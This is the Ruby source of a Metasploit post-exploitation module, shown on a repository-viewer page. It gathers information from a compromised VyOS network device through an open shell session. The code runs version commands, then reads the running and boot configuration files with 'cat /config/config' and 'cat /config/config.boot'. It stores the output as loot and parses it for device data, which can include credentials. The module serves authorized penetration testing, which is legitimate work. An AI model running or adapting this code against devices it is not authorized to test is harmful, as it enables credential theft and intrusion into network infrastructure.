CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/networking/gather/enum_vyos.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Auxiliary::VYOS

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'VyOS Gather Device General Information',

14
        'Description' => %q{

15
          This module collects VyOS device information and configuration.

16
        },

17
        'License' => MSF_LICENSE,

18
        'Author' => ['h00die'],

19
        'SessionTypes' => ['shell'],

20
        'Notes' => {

21
          'Stability' => [CRASH_SAFE],

22
          'SideEffects' => [IOC_IN_LOGS],

23
          'Reliability' => []

24
        }

25
      )

26
    )

27
  end

28


29
  def run

30
    # Clear the screen

31
    session.shell_command("\n")

32


33
    # Get version info

34
    print_status('Getting version information')

35
    # 1.1.8, and prob before

36
    version_out = session.shell_command('/opt/vyatta/bin/vyatta-show-version')

37
    if version_out.include?('such file or directory')

38
      # 1.3, and prob newer

39
      version_out = session.shell_command('/usr/libexec/vyos/op_mode/show_version.py')

40
    end

41


42
    ver_loc = store_loot('vyos.version',

43
                         'text/plain',

44
                         session,

45
                         version_out.strip,

46
                         'version.txt',

47
                         'VyOS Version')

48


49
    # Print the version of VERBOSE set to true.

50
    vprint_good(version_out)

51
    vprint_good("Version information stored in to loot #{ver_loc}")

52


53
    # run additional information gathering

54
    enum_configs

55
  end

56


57
  # run commands found in exec mode under privilege 1

58
  def enum_configs

59
    host = session.session_host

60
    port = session.session_port

61
    exec_commands = [

62
      {

63
        'cmd' => 'cat /config/config',

64
        'fn' => 'get_running_config',

65
        'desc' => 'Get Running Config on VyOS Device'

66
      },

67
      {

68
        'cmd' => 'cat /config/config.boot',

69
        'fn' => 'get_config',

70
        'desc' => 'Get Boot Config on VyOS Device'

71
      },

72
    ]

73
    exec_commands.each do |ec|

74
      command = ec['cmd']

75
      cmd_out = session.shell_command(command).gsub(command, '')

76
      print_status("Gathering info from #{command}")

77
      vyos_config_eater(host, port, cmd_out.strip)

78
    end

79
  end

80
end

81


82